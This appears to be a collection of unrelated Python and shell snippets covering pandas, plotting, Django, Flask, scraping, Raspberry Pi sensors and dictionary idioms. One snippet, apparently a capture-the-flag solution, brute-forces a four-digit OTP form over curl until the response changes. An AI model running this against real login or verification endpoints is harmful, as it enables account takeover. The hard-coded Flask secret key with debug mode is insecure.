        # Space-separated items in insertion order.
        return ' '.join([str(i) for i in self.queue])

    # for checking if the queue is empty
    def isEmpty(self):
        return len(self.queue) == 0

    # for inserting an element in the queue
    def insert(self, data):
        self.queue.append(data)

    def delete(self):
        """Remove and return the largest queued item.

        Fix: the index variable was named ``max``, shadowing the builtin.
        The original behaviour on an empty queue (print a blank line and
        exit the interpreter) is preserved, questionable as it is.
        """
        try:
            best = 0
            for i in range(len(self.queue)):
                if self.queue[i] > self.queue[best]:
                    best = i
            item = self.queue[best]
            del self.queue[best]
            return item
        except IndexError:
            print()
            exit()
split_col = pyspark.sql.functions.split(df['my_str_col'], '-')
df = df.withColumn('NAME1', split_col.getItem(0))
df = df.withColumn('NAME2', split_col.getItem(1))
gdown https://drive.google.com/uc?id=
# Customize the plot
ax.grid(1, ls='--', color='#777777', alpha=0.5, lw=1)
ax.tick_params(labelsize=12, length=0)
ax.set_axis_bgcolor('w')
# add a legend
leg = plt.legend( ['text'], loc=1 )
fr = leg.get_frame()
fr.set_facecolor('w')
fr.set_alpha(.7)
plt.draw()
 
import pylab as plt
import numpy as np

plt.style.use('ggplot')

fig = plt.figure(1)
ax = plt.gca()

# make some testing data
x = np.linspace( 0, np.pi, 1000 )
test_f = lambda x: np.sin(x)*3 + np.cos(2*x)

# plot the test data
ax.plot( x, test_f(x) , lw = 2)

# set the axis labels
ax.set_xlabel(r'$x$', fontsize=14, labelpad=10)
ax.set_ylabel(r'$f(x)$', fontsize=14, labelpad=25, rotation=0)

# set axis limits
ax.set_xlim(0,np.pi)

plt.draw()
 
def invoke_lambda_calculate_accounts(client_id):
    lambda_client = boto3.client('lambda')
    payload = {
        'client_id': client_id
    }
    response = lambda_client.invoke(
        FunctionName='arn:aws:lambda:sa-east-1:622978847361:function:calculate-accounts',
        InvocationType='RequestResponse',
        Payload=json.dumps(payload)
    )
    return response
pip3 install --trusted-host pypi.org --trusted-host files.pythonhosted.org flask-wtf
pytest
pytest folder/path/
pytest --cov=app
py.test -k methodname -v
py.test file_name.py::test_name -v
# Import system modules
import os
import sys
import arcpy

# Set workspace.
# Fixes: the UNC path was unquoted (a SyntaxError), and ``env`` was never
# imported — use arcpy.env with a raw string so backslashes survive.
arcpy.env.workspace = r"\\Client\H\Documents\RRC\Year_3\ARP\Data\soil_metadata_clip"
# Set local variables (raw string makes the backslash intent explicit)
out_folder_path = r"I:\ARW Data"
out_name = "soil_metadata_clip.gdb"
# Execute CreateFileGDB
arcpy.CreateFileGDB_management(out_folder_path, out_name)
import arcpy
from arcpy import env 
from arcpy.sa import * 
arcpy.env.workspace = r"I:\ARW_Data\Data\Raw_Data\Soil_Moisture\2011"
arcpy.env.overwriteOutput = True
arcpy.CheckOutExtension('Spatial')
mask = r"I:\ARW_Data\slc_90m_clip1"
arcpy.env.cellSize = r"I:\ARW_Data\slc_90m_clip2"
rasters = arcpy.ListRasters("*.tif", "TIF")
for raster in rasters:
 outraster = raster.replace('.tif','_clip.tif')
 arcpy.gp.ExtractByMask_sa(raster,mask,outraster)
df_mapping['_map'] = df_mapping['name']+df_mapping['address']
df_mapping.set_index('_map',inplace=True)

df_masked['_map'] = df_masked['name']+df_masked['address']
df_masked['company_name'] = df_masked['_map'].map(df_mapping['company_name'].to_dict())
def model(data, column_to_drop, type_of_model, n_neighbors=4):
    """Fit a quick regression on *data* and print its test-set R².

    Parameters:
        data: DataFrame containing the features plus the target column.
        column_to_drop: name of the target column.
        type_of_model: 'LinearRegressor' or 'KNeighborsRegressor';
            any other value silently does nothing (unchanged behaviour).
        n_neighbors: k for the KNN regressor.

    Fixes: removed the unused ``LinearRegression`` import, and no longer
    binds the fit result to a local named ``model`` (which shadowed this
    function and was never used).
    """
    from sklearn.model_selection import train_test_split
    from sklearn.metrics import r2_score
    from sklearn import linear_model

    X = data.drop([column_to_drop], axis=1)
    y = data[column_to_drop]
    # Fixed 70/30 split; random_state pinned for reproducibility.
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=100)

    if type_of_model == 'LinearRegressor':
        lm = linear_model.LinearRegression()
        lm.fit(X_train, y_train)
        predictions = lm.predict(X_test)
        print("The R2 of the linear model is: ", round(r2_score(y_test, predictions), 3))
    if type_of_model == 'KNeighborsRegressor':
        from sklearn.neighbors import KNeighborsRegressor
        knn_model = KNeighborsRegressor(n_neighbors=n_neighbors)
        knn_model.fit(X_train, y_train)
        knn_predictions = knn_model.predict(X_test)
        print("The R2 of the knn model is: ", round(r2_score(y_test, knn_predictions), 3))

model(data_copy, 'name_your_target_column', 'LinearRegressor')
model(data_copy, 'name_your_target_column', 'KNeighborsRegressor', n_neighbors=4)
data.isin([' ', '0', 0, '', np.nan]).sum()
for i in categoricals:
    print(i, categoricals[i].unique())

for i in categoricals:
    print(i, categoricals[i].isin(['', ' ', '0']).sum())

#check the null and 0 values per each categorical feature 
data_copy=data.copy()
data_copy.head()
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt

def bin_dist():
    test_list = [10, 100, 1000, 10000]
    for i in test_list:
        x = np.random.binomial(n=i, p=0.5, size=i)
        print('--',i,'--')
        sns.distplot(x)
        plt.show()
        
bin_dist()
data_copy["ts"] = data_copy["effective_to_date"].astype("int64")/1e9 
data_copy["ts"].iloc[1]
# the division exclude milliseconds bringing it down to seconds
In [1]: from datetime import datetime
In [2]: import dateutil.relativedelta
In [3]: today_date = datetime.now().date()
In [4]: today_date
Out[1]: datetime.date(2016, 7, 5)
In [5]: last_month = today_date - dateutil.relativedelta.relativedelta(months=1)
In [6]: last_mont_first_date = last_month.replace(day=1)
In [7]: last_mont_first_date
Out[2]: datetime.date(2016, 6, 1)
def delete_last_line(path='test.txt'):
    """Remove the final line of *path* in place and return it.

    Generalized: *path* defaults to 'test.txt', preserving the original
    call signature.  The file is scanned backwards from the end for the
    previous newline; everything after that newline is truncated away
    (including that newline itself, matching the original behaviour).

    Returns the removed line, including its trailing newline if any.
    """
    with open(path, "r+", encoding="utf-8") as file:
        # Jump to the end of the file.
        file.seek(0, os.SEEK_END)

        # Skip the very last character: if the file ends with a newline we
        # want the newline *before* the last line, not the terminator.
        pos = file.tell() - 1

        # Walk backwards one character at a time until a newline (or the
        # start of the file) is found.
        while pos > 0 and file.read(1) != "\n":
            pos -= 1
            file.seek(pos, os.SEEK_SET)

        # The file position now sits just past that newline: capture the
        # last line before truncating it away.
        value = file.readline()

        # Unless the whole file was a single line, cut everything from the
        # newline preceding the last line onward.
        if pos > 0:
            file.seek(pos, os.SEEK_SET)
            file.truncate()

        return value
import pandas as pd

# Read every worksheet of the workbook into {sheet name: DataFrame}.
# Fixes: the keyword is ``sheet_name`` (``sheetname`` was removed),
# ``DataFrame.append`` no longer exists in pandas 2.x (use pd.concat),
# and the Python-2 ``print full_table`` was a SyntaxError in Python 3.
sheets_dict = pd.read_excel('Book1.xlsx', sheet_name=None)

frames = []
for name, sheet in sheets_dict.items():
    # Tag every row with the worksheet it came from.
    sheet['sheet'] = name
    # Keep only the last line of multi-line column headers.
    sheet = sheet.rename(columns=lambda x: x.split('\n')[-1])
    frames.append(sheet)

# Guard the empty-workbook case (pd.concat([]) raises).
full_table = pd.concat(frames) if frames else pd.DataFrame()
full_table.reset_index(inplace=True, drop=True)

print(full_table)
df = pd.DataFrame(np.random.randint(32, 120, 100000).reshape(50000,2),columns=list('AB'))
df['A'] = df['A'].apply(chr)

%timeit dict(zip(df.A,df.B))
%timeit pd.Series(df.A.values,index=df.B).to_dict()
%timeit df.set_index('A').to_dict()['B']
pip install -Uqq fastbook

import fastbook
fastbook.setup_book()
from fastbook import *
from fastai.vision.widgets import *
from fastai.vision.all import *
path = untar_data(URLs.PASCAL_2007)
from time import gmtime, strftime

 strftime("%Y-%m-%d %H:%M:%S", gmtime())
'2009-01-05 22:14:39'

import os
import glob

# read the ds18b20 sensor 
os.system('modprobe w1-gpio')
os.system('modprobe w1-therm')
 
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'

def read_temp_raw(path=None):
    """Return all lines of the 1-wire slave file.

    Generalized: *path* defaults to the module-level ``device_file``
    (original behaviour).  Uses ``with`` so the handle is always closed,
    even if the read raises.
    """
    if path is None:
        path = device_file
    with open(path, 'r') as f:
        return f.readlines()
 
def read_temp():
    """Poll the DS18B20 sensor until a valid reading and return (°C, °F).

    Returns None implicitly if the second line carries no 't=' field.
    NOTE(review): relies on ``time`` being imported at module level
    elsewhere in this file — confirm before extracting this snippet.
    """
    lines = read_temp_raw()
    # First line ends in 'YES' when the CRC check passed; retry otherwise.
    while lines[0].strip()[-3:] != 'YES':
        time.sleep(0.2)
        lines = read_temp_raw()
    # Second line carries the reading as 't=<milli-degrees C>'.
    equals_pos = lines[1].find('t=')
    if equals_pos != -1:
        temp_string = lines[1][equals_pos+2:]
        temp_c = float(temp_string) / 1000.0
        temp_f = temp_c * 9.0 / 5.0 + 32.0
        return temp_c, temp_f
 
from gpiozero import CPUTemperature

# get the temperature of the CPU of the Raspberry
# get the temperature of the CPU of the Raspberry
def getRaspiCpuTemperature(temp_file="/sys/class/thermal/thermal_zone0/temp"):
    """Return the CPU temperature in °C read from the sysfs thermal zone.

    Generalized: *temp_file* may point at any file containing the value
    in milli-degrees; the default preserves the original behaviour.
    Uses ``with`` so the file is closed even if the read raises.
    """
    with open(temp_file) as f:
        cpu_temp = f.read()
    # The kernel reports milli-degrees Celsius.
    return (float(cpu_temp) / 1000)

# get the temperature of the CPU of the Raspberry
# with gpiozero
def getRaspiCpuTemperature02():
    gpiozero_cpu = CPUTemperature()
    return (gpiozero_cpu.temperature)
import socket

# get the current IP adress
def get_ip_adress():
    """Return the machine's primary local IP address.

    Opens a UDP socket "towards" a public resolver — connect() on UDP
    sends no packets, it only makes the OS pick a local address — and
    reads that address back.  The socket is now always closed, even if
    connect() raises.  (Function name spelling kept for existing callers.)
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        return s.getsockname()[0]
    finally:
        s.close()
from bs4 import BeautifulSoup, Tag
import re

data = '''<div>
<a href="link_1">Link 1</a>
<a href="link_2">Link 1</a>
<a href="link_XXX">Link 1</a>
<a href="link_3">Link 1</a>
</div>'''

soup = BeautifulSoup(data, 'lxml')

class my_regex_searcher:
    """Callable filter for BeautifulSoup searches that also records the
    regex groups captured from every matching tag name or attribute."""

    def __init__(self, regex_string):
        self.__r = re.compile(regex_string)
        self.groups = []

    def __call__(self, what):
        # BeautifulSoup may hand us a Tag object; match against its name.
        if isinstance(what, Tag):
            what = what.name

        if not what:
            return False
        found = self.__r.findall(what)
        if not found:
            return False
        self.groups.append(found)
        return True

    def __iter__(self):
        # Iterating the searcher yields the recorded group lists in order.
        yield from self.groups

searcher = my_regex_searcher(r'link_(\d+)')
for l, groups in zip(soup.find_all(href=searcher), searcher):
    print(l)
    print(groups)

searcher = my_regex_searcher(r'(d)(i)(v)')
for l, groups in zip(soup.find_all(searcher), searcher):
    print(l.prettify())
    print(groups)
listOfSeries = []

for df in dfs:
	listOfSeries.append(df[df.columns[0]])

# df.iloc[:, 0]
# df[df.columns[0]]

newDF = pd.concat(listOfSeries, axis=1)
//template

{% for contact in page_obj %}
    {# Each "contact" is a Contact model object. #}
    {{ contact.full_name|upper }}<br>
    ...
{% endfor %}

<div class="pagination">
    <span class="step-links">
        {% if page_obj.has_previous %}
            <a href="?page=1">&laquo; first</a>
            <a href="?page={{ page_obj.previous_page_number }}">previous</a>
        {% endif %}

        <span class="current">
            Page {{ page_obj.number }} of {{ page_obj.paginator.num_pages }}.
        </span>

        {% if page_obj.has_next %}
            <a href="?page={{ page_obj.next_page_number }}">next</a>
            <a href="?page={{ page_obj.paginator.num_pages }}">last &raquo;</a>
        {% endif %}
    </span>
</div>
         

//views.py
         
from django.core.paginator import Paginator
from django.shortcuts import render

from myapp.models import Contact

def listing(request):
    contact_list = Contact.objects.all()
    paginator = Paginator(contact_list, 25) # Show 25 contacts per page.

    page_number = request.GET.get('page')
    page_obj = paginator.get_page(page_number)
    return render(request, 'list.html', {'page_obj': page_obj})       
{% if request.resolver_match.url_name == 'home' %} active {% endif %}
Path(BASE_DIR, 'templates')
admin.site.site_header = 'WISEMAN'
    def __str__(self):
        return self.title
//inside the class on the model

class Meta: 
        verbose_name = "Movie"
        verbose_name_plural = "Movies"
//settings.py

STATICFILES_DIRS = [
    Path(BASE_DIR, "static"),
]

//urls.py

from django.conf import settings
from django.conf.urls.static import static

 + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
//settings.py

MEDIA_ROOT = Path(BASE_DIR, 'media/')

//main urls.py

from django.conf import settings
from django.conf.urls.static import static

urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# me - this DAT
# scriptOp - the OP which is cooking

# press 'Setup Parameters' in the OP to call this function to re-create the parameters.
def onSetupParameters(scriptOp):
	page = scriptOp.appendCustomPage('Parameters')
	p = page.appendInt('Par1', label='ParA')
	p = page.appendFloat('Par2', label='ParB')
	return
		
# called whenever custom pulse parameter is pushed
def onPulse(par):
	return

def onCook(scriptOp):
	scriptOp.clear()
	
	#Declare Variables
	samples = scriptOp.par.Samples

	# Assign Samples to CHOP
	scriptOp.numSamples = samples

	#Calculate Step Size

	# Append output channels
	tx = scriptOp.appendChan('tx')
	ty = scriptOp.appendChan('ty')
	tz = scriptOp.appendChan('tz')

	#Assign Value to channels Implementing the Parametric Equation
	return
import os
def split(word):
    """Return the characters of *word* as a list.

    Idiom fix: ``list(word)`` replaces the manual comprehension.
    """
    return list(word)
f1=open('wordlist.txt','r')
invalid_response=os.popen('curl -H "User-Agent: th3pr0xyb0y/1337" "http://ratelimit.noobarmy.org/Enterotp" -H "Content-Type: application/x-www-form-urlencoded" -d "digit_1=1&digit_2=2&digit_3=3&digit_4=4" --silent').read()
numbers=f1.read().splitlines()
for i in numbers:
    temp=split(i)
    smallpayload="digit_1="+temp[0]+"&digit_2="+temp[1]+"&digit_3="+temp[2]+"&digit_4="+temp[3]
    payload= 'curl -H "User-Agent: th3pr0xyb0y/1337" "http://ratelimit.noobarmy.org/Enterotp" -H "Content-Type: application/x-www-form-urlencoded" -d "'+smallpayload+'" --silent '
    print("Testing OTP",temp[0],temp[1],temp[2],temp[3])
    # print(payload)
    response=os.popen(payload).read()
    if(response!=invalid_response):
        print("Correct OTP IS ",temp[0],temp[1],temp[2],temp[3])
        print("Flag Is : ",response)
        exit(0)

def combinations(n, k):
    '''
    Returns the number of ways you can choose k items out of n if order does not matter

    Parameters:
    ----------
    n: (int)
    k: (int)

    Returns:
    ----------
    The number of combinations of k items out of n, as an exact int.

    Fix: the original divided with ``/``, which returns a float and loses
    precision once the factorials exceed 2**53; floor division keeps the
    arithmetic exact (the quotient is always an integer), and the result
    still compares equal to the old float output for small inputs.
    '''
    import math
    return math.factorial(n) // (math.factorial(k) * math.factorial(n - k))

def poisson_pmf(lmbda, k):
    """P(X = k) for X ~ Poisson(lmbda).

    Fix: the original referenced bare ``e`` and ``factorial``, which are
    never imported anywhere in this file, so every call raised NameError.
    """
    import math
    return (lmbda ** k) * math.exp(-lmbda) / math.factorial(k)
print(poisson_pmf(3, 2)) #0.22404180765538778
import json

with open('data.txt') as json_file:
    data = json.load(json_file)
    for p in data['people']:
        print('Name: ' + p['name'])
        print('Website: ' + p['website'])
        print('From: ' + p['from'])
        print('')
import json

data = {}
data['people'] = []
data['people'].append({
    'name': 'Scott',
    'website': 'stackabuse.com',
    'from': 'Nebraska'
})
data['people'].append({
    'name': 'Larry',
    'website': 'google.com',
    'from': 'Michigan'
})

with open('data.txt', 'w') as outfile:
    json.dump(data, outfile)
def get_stats(account_email, account_password):
	print("Getting stats for account %s" % account_email)
	chrome_options = Options() 
	# chrome_options.add_argument("--headless")
	path_to_driver = os.path.join(
		os.path.dirname(os.path.dirname(os.getcwd())), "chromedriver.exe")
	driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)
	# login
	driver.get("https://www.tumblr.com/login")
	driver.set_window_size(1294, 1400)
	driver.find_element(By.ID, "signup_determine_email").send_keys("youremailaddress")
	driver.find_element(By.ID, "signup_determine_email").send_keys(Keys.ENTER)
	time.sleep(1)
	driver.find_element(By.LINK_TEXT, "Use password to log in").click()
	time.sleep(1)
	driver.find_element(By.ID, "signup_password").send_keys("yourpassword")
	driver.find_element(By.ID, "signup_password").send_keys(Keys.ENTER)
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from datetime import date

def upload_stat_data_to_google_sheets(email, posts_in_queue, followers):
	scope = ["https://spreadsheets.google.com/feeds", 'https://www.googleapis.com/auth/spreadsheets',
		"https://www.googleapis.com/auth/drive.file", "https://www.googleapis.com/auth/drive"]

	creds = ServiceAccountCredentials.from_json_keyfile_name(
		os.path.join(os.getcwd(), 'stat_scraper',"google_cloud_credentials.json"), scope)

	client = gspread.authorize(creds)

	sheet = client.open("automation_stats").sheet1
	analytics = client.open("automation_stats").worksheet("analytics")
	data = sheet.get_all_records()
	current_date = date.today().strftime('%d.%m.%y')
	row_to_insert = [[current_date, email, posts_in_queue, followers]]	
	sheet.append_rows(row_to_insert)
logging.basicConfig(
  level="INFO",
  format="%(asctime)s   (%(filename)s:%(lineno)s) %(levelname)s - %(message)s",
  datefmt="%Y-%m-%d - %H:%M:%S"
)
time = "01:34:11"
sum(x * int(t) for x, t in zip([3600, 60, 1], time.split(":"))) 
return sorted(list_of_dicts, key=lambda e: e['dict_key'], reverse=True)
In [2]: read_csv('sample.csv', dtype={'ID': object})
Out[2]: 
                           ID
0  00013007854817840016671868
1  00013007854817840016749251
2  00013007854817840016754630
3  00013007854817840016781876
4  00013007854817840017028824
5  00013007854817840017963235
6  00013007854817840018860166
1
2
3
4
5
6
a = [[1, 2, 3, 4], [5, 6], [7, 8, 9]]
for i in range(len(a)):
    for j in range(len(a[i])):
        print(a[i][j], end=' ')
    print()
pip list --outdated --format=freeze | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U
# open a json file for reading and print content using json.load
with open("/xyz/json_data.json", "r") as content:
  print(json.load(content))

# If we want to use json.loads():

with open("json_data.json", "r") as content:
  print(json.loads(content.read()))
def factorial(n):
  """Return n!, defined recursively with 0! == 1."""
  return 1 if n == 0 else n * factorial(n - 1)
print(factorial(5))
#This is a code comment and anything we put after the # will not run
#print(5) should return 5 but because it is in a comment it won't show up
# Python program to illustrate
# not 'in' operator
x = 24
y = 20
# Renamed from `list`: shadowing the built-in breaks any later list(...) call.
numbers = [10, 20, 30, 40, 50]

if x not in numbers:
	print("x is NOT present in given list") 
else: 
	print("x is present in given list") 

if y in numbers:
	print("y is present in given list") 
else: 
	print("y is NOT present in given list") 

# Python program to illustrate
# Finding common member in list
# using 'in' operator
list1 = [1, 2, 3, 4, 5]
list2 = [6, 7, 8, 9]
for item in list1:
    if item in list2:
        print("overlapping")
        # Stop at the first common member. Without this break the loop's
        # else-clause always runs, so "not overlapping" was printed even
        # when an overlap had been found.
        break
else:
    print("not overlapping")
>>> [a+b for a,b in re.findall('id_([a-z]+)|num([0-9]+)', s)]
['john', '847']
import glob
import os

# Find the newest file (by ctime) in a folder.
list_of_files = glob.glob('/path/to/folder/*') # * means all if need specific format then *.csv
latest_file = max(list_of_files, key=os.path.getctime)
# print is a function in Python 3 — the original `print latest_file` is a SyntaxError.
print(latest_file)
# Group by 'name', aggregate mean and sum of 'ext price', and render both as
# dollar-formatted strings via the pandas Styler.
# NOTE(review): `df` and `dfCombined` are defined elsewhere — assumes columns
# 'name', 'ext price' and 'Amount' exist.
(df.groupby('name')['ext price']
 .agg(['mean', 'sum'])
 .style.format('${0:,.2f}'))
# One-off: total of 'Amount' formatted as currency.
'${:,.2f}'.format(dfCombined['Amount'].sum())
In [8]: from bs4 import BeautifulSoup

In [9]: from selenium import webdriver

In [10]: driver = webdriver.Firefox()

In [11]: driver.get('http://news.ycombinator.com')

In [12]: html = driver.page_source

In [13]: soup = BeautifulSoup(html)

In [14]: for tag in soup.find_all('title'):
   ....:     print(tag.text)
   ....:     
   ....:     
Hacker News
import bs4

# Minimal markup: an <img> nested inside an <a> inside a <div>.
html = """<div class="someClass">
    <a href="href">
        <img alt="some" src="some"/>
    </a>
</div>"""

soup = bs4.BeautifulSoup(html, "html.parser")

# this will return src attrib from img tag that is inside 'a' tag
# (soup.a is the first <a>; attribute access raises if no <img> child exists)
soup.a.img['src']

>>> 'some'

# if you have more then one 'a' tag
# guard with `if a.img` since an <a> without an <img> yields None
for a in soup.find_all('a'):
    if a.img:
        print(a.img['src'])

>>> 'some'
# Six ways to find the key(s) that map to a given value in a dict.
my_dict = {"color": "red", "width": 17, "height": 19}
value_to_find = "red"

# Brute force solution (fastest) -- single key
for key, value in my_dict.items():
    if value == value_to_find:
        print(f'{key}: {value}')
        break

# Brute force solution -- multiple keys
for key, value in my_dict.items():
    if value == value_to_find:
        print(f'{key}: {value}')

# Generator expression -- single key
# NOTE(review): next() raises StopIteration if no key maps to the value.
key = next(key for key, value in my_dict.items() if value == value_to_find)
print(f'{key}: {value_to_find}')

# Generator expression -- multiple keys
exp = (key for key, value in my_dict.items() if value == value_to_find)
for key in exp:
    print(f'{key}: {value}')

# Inverse dictionary solution -- single key
# (collisions keep only the last key for a duplicated value)
my_inverted_dict = {value: key for key, value in my_dict.items()}
print(f'{my_inverted_dict[value_to_find]}: {value_to_find}')

# Inverse dictionary solution (slowest) -- multiple keys
my_inverted_dict = dict()
for key, value in my_dict.items():
    my_inverted_dict.setdefault(value, list()).append(key)
print(f'{my_inverted_dict[value_to_find]}: {value_to_find}')
# Four ways to invert a dictionary (value -> key), plus inverting back.
my_dict = {
  'Izuku Midoriya': 'One for All', 
  'Katsuki Bakugo': 'Explosion', 
  'All Might': 'One for All', 
  'Ochaco Uraraka': 'Zero Gravity'
}

# Use to invert dictionaries that have unique values
my_inverted_dict = dict(map(reversed, my_dict.items()))

# Use to invert dictionaries that have unique values
my_inverted_dict = {value: key for key, value in my_dict.items()}

# Use to invert dictionaries that have non-unique values
from collections import defaultdict
my_inverted_dict = defaultdict(list)
# A plain loop, not a comprehension: the original set-comprehension built a
# throwaway set of None purely for its append side effects.
for k, v in my_dict.items():
    my_inverted_dict[v].append(k)

# Use to invert dictionaries that have non-unique values
my_inverted_dict = dict()
for key, value in my_dict.items():
    my_inverted_dict.setdefault(value, list()).append(key)

# Use to invert dictionaries that have lists of values
my_dict = {value: key for key in my_inverted_dict for value in my_inverted_dict[key]}
# Five ways to merge dictionaries (later dicts win on key collisions).
yusuke_power = {"Yusuke Urameshi": "Spirit Gun"}
hiei_power = {"Hiei": "Jagan Eye"}
powers = dict()

# Brute force
for dictionary in (yusuke_power, hiei_power):
    for key, value in dictionary.items():
        powers[key] = value

# Dictionary Comprehension
powers = {key: value for d in (yusuke_power, hiei_power) for key, value in d.items()}

# Copy and update
powers = yusuke_power.copy()
powers.update(hiei_power)

# Dictionary unpacking (Python 3.5+)
powers = {**yusuke_power, **hiei_power}

# Backwards compatible function for any number of dicts
def merge_dicts(*dicts: dict):
    """Merge any number of dicts left-to-right into a new dict."""
    merged_dict = dict()
    for dictionary in dicts:
        # was `merge_dict.update(...)` — a typo that raised NameError
        merged_dict.update(dictionary)
    return merged_dict

# Dictionary union operator (Python 3.9+)
powers = yusuke_power | hiei_power
# Create a virtualenv named "env", activate it, and deactivate when done.
virtualenv env

# linux
source env/bin/activate

#windows
env\Scripts\activate.bat

# leave the virtualenv (any platform)
deactivate
from flask import Flask, render_template, request, redirect


# Minimal Flask app demonstrating query-parameter and JSON-body handlers.
app = Flask(__name__)
app.config['SECRET_KEY'] = 'dajdsjas'


@app.route('/home')
def home():
    """Plain-text landing page."""
    return 'Home page'


@app.route('/take_parameter', methods=["POST"])
def takeparam():
    """Read URL query parameters.

    request.args is a dict-like MultiDict, not a callable — the original
    `request.args(silent=True)` raised TypeError on every request and the
    bare except turned that into a 500.
    """
    try:
        pas = request.args
        #app.logger.info(pas)
        return 'OK'
    except Exception:  # narrowed from a bare except that also swallowed SystemExit
        return 'INTERNAL ERROR', 500


@app.route('/take_json', methods=["POST"])
def takejson():
    """Read the JSON request body (None on parse failure thanks to silent=True)."""
    try:
        pas = request.get_json(silent=True)
        #app.logger.info(json)
        return 'OK'
    except Exception:
        return 'INTERNAL ERROR', 500

if __name__ == '__main__':
    app.run(debug=True)
 
# Works with matplotlib and seaborn

# IPython/Jupyter-only settings: render inline figures at retina resolution
# and echo the value of every expression in a cell, not just the last one.
%config InlineBackend.figure_format ='retina'
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
from itertools import zip_longest

# Pair two unequal-length lists; the shorter side is padded with 'x'.
l1 = [1, 2, 3, 4, 5, 6, 7]
l2 = ['a', 'b', 'c', 'd']
d1 = zip_longest(l1, l2, fillvalue='x')
# zip_longest is lazy — printing it shows only the object repr.
print(d1)
# Materialise the pairs into a dict (this consumes the iterator):
# {1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'x', 6: 'x', 7: 'x'}
print(dict(d1))
from time import strptime
# Parse an abbreviated month name ('Jan' .. 'Dec') into its number (1..12)
# via the %b directive; tm_mon holds the month field of the struct_time.
month_name = 'Jan'
month_number = strptime(month_name, '%b').tm_mon
month_number

# Reference table of strftime/strptime format directives (kept as-is):
'''
%a  Locale’s abbreviated weekday name.    
%A  Locale’s full weekday name.    
%b  Locale’s abbreviated month name.  
%B  Locale’s full month name.      
%c  Locale’s appropriate date and time representation.    
%d  Day of the month as a decimal number [01,31].    
%f  Microsecond as a decimal number [0,999999], zero-padded on the left     (1)
%H  Hour (24-hour clock) as a decimal number [00,23].    
%I  Hour (12-hour clock) as a decimal number [01,12].    
%j  Day of the year as a decimal number [001,366].  
%m  Month as a decimal number [01,12].  
%M  Minute as a decimal number [00,59].      
%p  Locale’s equivalent of either AM or PM.   (2)
%S  Second as a decimal number [00,61].     (3)
%U  Week number of the year (Sunday as the first day of the week) as a decimal number [00,53]. All days in a new year preceding the first Sunday are considered to be in week 0.    (4)
%w  Weekday as a decimal number [0(Sunday),6].  
%W  Week number of the year (Monday as the first day of the week) as a decimal number [00,53]. All days in a new year preceding the first Monday are considered to be in week 0.    (4)
%x  Locale’s appropriate date representation.      
%X  Locale’s appropriate time representation.      
%y  Year without century as a decimal number [00,99].    
%Y  Year with century as a decimal number.  
%z  UTC offset in the form +HHMM or -HHMM (empty string if the the object is naive).    (5)
%Z  Time zone name (empty string if the object is naive).    
%%  A literal '%' character.
'''
>>> mydict = {'one': [1,2,3], 2: [4,5,6,7], 3: 8}

>>> dict_df = pd.DataFrame({ key:pd.Series(value) for key, value in mydict.items() })

>>> dict_df

   one  2    3
0  1.0  4  8.0
1  2.0  5  NaN
2  3.0  6  NaN
3  NaN  7  NaN
import re

# Remove punctuation: delete every character that is neither a word
# character nor whitespace.
punct_pattern = re.compile(r'[^\w\s]')
s = "string. With. Punctuation?"
s = punct_pattern.sub('', s)
import os  
# Classify a path: directory, regular file, or something else
# (socket, FIFO, device — or, NOTE(review), also a path that does not exist).
path="abc.txt"  
if os.path.isdir(path):  
    print("\nIt is a directory")  
elif os.path.isfile(path):  
    print("\nIt is a normal file")  
else:  
    print("It is a special file (socket, FIFO, device file)" )
print()


# Parse the column to datetimes, then plot the mean of each calendar month.
df['column_name'] = pd.to_datetime(df['column_name'])
# new version
# NOTE(review): freq="M" (month-end) is deprecated in pandas >= 2.2 in
# favour of "ME" — confirm the target pandas version.
df.groupby(pd.Grouper(key='column_name', freq="M")).mean().plot()
# time.clock() was removed in Python 3.8 — perf_counter() is the supported
# high-resolution timer for elapsed-time measurement.
start_time = time.perf_counter()
result = 0
# Hoist the loop-invariant column-index lookups out of the hot loop.
b_idx = df.columns.get_loc('B')
c_idx = df.columns.get_loc('C')
for row in df.itertuples(index=False):
    result += max(row[b_idx], row[c_idx])

total_elapsed_time = round(time.perf_counter() - start_time, 2)
print("4. Polyvalent Itertuples working even with special characters in the column name done in {} seconds, result = {}".format(total_elapsed_time, result))
import pkg_resources, string
from symspellpy import SymSpell, Verbosity

# Spell-checker backed by SymSpell's bundled English frequency dictionary.
spell = SymSpell(max_dictionary_edit_distance=2, prefix_length=7)
dictionary_path = pkg_resources.resource_filename('symspellpy', 'frequency_dictionary_en_82_765.txt')
spell.load_dictionary(dictionary_path, term_index=0, count_index=1)

def correct(w):
  """Return the best spelling correction for token w, keeping the original
  token's capitalisation and its leading/trailing punctuation.

  Returns w unchanged when SymSpell has no suggestion.
  """
  word = w
  o = spell.lookup(w,
    Verbosity.CLOSEST,
    max_edit_distance=2,
    transfer_casing=True)
  if not o: return w
  word = o[0].term
  # Re-apply an initial capital if the input token had one.
  if w[0].isupper():
    word = word[0].upper() + ''.join(word[1:])
  # find start punctuation
  # (walk forward from index 0 collecting punctuation chars)
  start_idx = 0
  start_punct = ''
  while w[start_idx] in string.punctuation:
    start_punct += w[start_idx]
    if start_idx + 1 < len(w):
      start_idx += 1
    else:
      break
  # find end punctuation
  # (walk backward from the end; NOTE(review): end_idx starts at 1 and is
  # decremented, so only the final character is ever inspected — confirm
  # whether multi-char trailing punctuation was intended)
  end_idx = 1
  end_punct = ''
  while w[-end_idx] in string.punctuation:
    end_punct += w[-end_idx]
    if end_idx - 1 > 0:
      end_idx -= 1
    else:
      break
  return start_punct + word + end_punct

# Demo: correct a paragraph with deliberately clipped words, token by token.
